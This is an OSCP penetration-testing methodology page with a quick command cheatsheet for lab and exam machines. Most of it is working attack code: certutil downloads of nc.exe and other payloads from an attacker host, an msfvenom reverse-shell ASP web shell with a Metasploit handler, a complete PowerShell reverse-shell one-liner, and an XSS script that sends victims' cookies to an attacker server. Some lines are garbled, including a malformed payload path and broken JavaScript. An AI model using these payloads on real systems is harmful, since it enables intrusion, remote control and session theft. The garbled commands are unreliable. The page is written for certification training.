OSCP Methodology

Introduction

About 
The checklist aim to assist OSCP students with a baseline methodology for the labs and exam environments. 

Checks
  • Scanning
  • Enumeration
  • Exploitation
  • Privilege Escalation
  • Flags
  • Post Exploitation

Quick Command Cheatsheet

Command
Description
Lsof -I
Kill -9 PID
Kill a specific service that you don’t use anymore.
rdesktop -g 90%  $IP
Remote desktop with screen area set to 90%.
 python -m SimpleHTTPServer 8000

certutil.exe -urlcache -split -f http://10.11.0.105:80/EX.exe

certutil.exe -urlcache -split -f http://10.11.0.105:8000/ipsec.sh accesschk.txt 
certutil.exe -urlcache -split -f http://10.11.0.105:8000/icacls.exe icacls.exe 
certutil.exe -urlcache -split -f http://10.11.0.105:8000/nc.exe nc.exe

Transfer files using Certutil.  This has been my rock during the OSCP challenge. Host a webserver on your box, I’ve used python webserver.
msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.105 LPORT=3333 -f asp > wireshell.asp

Within metasploit:
use exploit/multi/handler
set payload sho/x86/shell/reverse_tcp  
set lhost 10.11.0.105
set lport 3333

Multi/Handler example. Allowed during the exam.
$client = New-Object System.Net.Sockets.TCPClient("10.10.XX.XX",77);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Shell using powershell TCP one liner.
Create cookie.js file.
 
filevar img = document.createElement (“img”);
img.src = “http://youipaddress/ddos?” + escape(document.cookie);
document.body.appendChild(img);

Copy to webserver and inject.
'">><script src="http://10.XX.XX.XX/cookie.js"></script>


Stealing cookies using XSS.


Non OSCP machines

Some CTF machines you can practice on before taking the OSCP challenge.